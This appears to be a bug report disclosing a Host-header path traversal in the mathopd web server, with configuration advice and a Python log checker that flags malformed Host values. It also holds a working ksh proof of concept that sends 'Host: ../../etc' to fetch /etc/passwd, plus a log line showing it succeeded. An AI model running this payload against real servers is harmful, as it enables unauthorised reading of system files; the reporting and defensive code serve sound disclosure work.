Quite easy to reproduce with the ksh script attached.

The HTTP Host header is not checked against DNS to see whether it matches the socket.
That would be expensive; checking Host against a glob would be faster.

If the config could match /** or **..** in domains it would be okay,
but it did not seem to match; "**" should match anything, including '/'.
However, Host is not globbed. The only fix is to have a separate
Virtual section for each document root, with a Host entry for each HTTP
Host. I.e. you must use the exact HTTP Host.

Do not use Location /var/www/* as this matches an arbitrary HTTP Host.

For example, you could spam the users listed in /etc/passwd and say bad things
about the admin.

/var/log/mathopd/access.log
> 127.0.0.1       -       Sat Jul 28 09:29:39 2012        ../../etc       80      GET     /passwd -       HTTP/1.1        200     60      -       -
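As an added example that is not part of the report or of mathopd, the following Python reads access.log lines in the tab-separated layout of the line quoted above (field order is assumed from that one sample), flags requests whose Host field is not a plain hostname, and shows the server-side counterpart of the advice above: choosing a document root by exact Host lookup instead of by glob. The vhost table and the extra log lines are constructed.

```python
import re

# Constructed sample of mathopd access.log lines (tab-separated). Field order is
# assumed from the single line quoted in the report: client, -, date, Host, port,
# method, path, -, protocol, status, bytes, -, -. Line 1 is the report's own
# traversal request; lines 2 and 3 are made up for contrast.
SAMPLE_LOG = (
    "127.0.0.1\t-\tSat Jul 28 09:29:39 2012\t../../etc\t80\tGET\t/passwd\t-\tHTTP/1.1\t200\t60\t-\t-\n"
    "192.0.2.10\t-\tSat Jul 28 09:30:02 2012\twww.example.com\t80\tGET\t/index.html\t-\tHTTP/1.1\t200\t1234\t-\t-\n"
    "192.0.2.11\t-\tSat Jul 28 09:31:17 2012\twww.example.com:80\t80\tGET\t/../secret\t-\tHTTP/1.1\t404\t0\t-\t-\n"
)

# A Host value is acceptable only as a hostname made of RFC 1123 labels, with an
# optional :port. Anything containing '/', '..' or other path characters is a
# traversal attempt against a document root chosen by glob. (Bracketed IPv6
# literals are not handled here.)
HOST_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
    r"(?::[0-9]{1,5})?$"
)

def host_is_sane(host):
    return len(host) <= 255 and HOST_RE.match(host) is not None

def parse_line(line):
    f = line.rstrip("\n").split("\t")
    if len(f) < 11:
        return None
    return {"client": f[0], "time": f[2], "host": f[3], "method": f[5],
            "path": f[6], "status": f[9]}

def suspicious_hosts(log_text):
    """Return the parsed records whose Host field is not a plain hostname."""
    return [rec for rec in map(parse_line, log_text.splitlines())
            if rec is not None and not host_is_sane(rec["host"])]

# Server-side counterpart of the report's advice: pick the document root by
# exact Host lookup (port stripped, case folded), never by globbing Host.
def resolve_docroot(host, vhosts):
    if not host_is_sane(host):
        return None
    return vhosts.get(host.rsplit(":", 1)[0].lower())

VHOSTS = {"www.example.com": "/var/www/example"}  # constructed vhost table

if __name__ == "__main__":
    for rec in suspicious_hosts(SAMPLE_LOG):
        print("suspicious Host %r from %s requesting %s" % (rec["host"], rec["client"], rec["path"]))
    print(resolve_docroot("www.example.com:80", VHOSTS), resolve_docroot("../../etc", VHOSTS))
```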


#!/usr/bin/ksh
# Reproducer: send a request with an arbitrary Host header to the local server.
# HTTP lines end in CRLF; the carriage return is otherwise superfluous.
my_echo() { printf "%b\r\n" "$*"; }

# $1 = Host header value, $2 = request path; default to the case from the report.
test -n "$2" || set -- ../../etc /passwd

# ksh93 (and bash) open a TCP connection through the /dev/tcp pseudo-path.
exec 3<>/dev/tcp/localhost/80

{
my_echo "GET $2 HTTP/1.1"
my_echo "Host: $1"
my_echo "Connection: close"
my_echo ""
} >&3

# Print the server's response line by line.
while read -r LINE
do
printf "%s\n" "$LINE"
done <&3
